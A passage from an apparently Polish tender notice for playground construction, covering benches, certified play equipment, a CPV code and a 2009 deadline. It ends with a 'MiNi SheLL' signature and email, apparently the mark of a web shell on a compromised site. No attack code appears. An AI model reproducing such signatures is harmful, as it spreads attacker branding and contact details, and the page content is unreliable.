sztucznych o wysokiej wytrzymałości. Elementy metalowe np. łańcuchy, zawiesia ze stali nierdzewnej, malowane proszkowo.
Na placu zabaw zamontować 6 sztuk ławek miejskich z oparciem oraz 2 sztuk ławek bez oparcia (w sąsiedztwie placu do gry w koszykówkę).
Konstrukcja ławki z metalu : stopy montowane do podłoża za pomocą śrub
rozporowych, siedzisko i oparcie z desek świerkowych impregnowanych i
malowanych.
Plac zabaw należy wyposażyć w tablicę na regulamin placu zabaw ustawioną przy wejściu.
Urządzenia zabawowe wykonane w technologii drewna okrągłego impregnowanego ciśnieniowo, z wykorzystaniem sklejki laminowanej oraz metalu lub konstrukcji stalowych. Wszystkie produkty musza posiadać certyfikaty zgodności z normami 
PN-EN 1176 (Wyposażenie placów zabaw) i PN - EN 1177 (Nawierzchnie placów zabaw amortyzujące upadki. Wymagania bezpieczeństwa i metody badań.)
Każde z montowanych urządzeń musi posiadać certyfikat bezpieczeństwa..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.11.27.23-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 16.11.2009.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com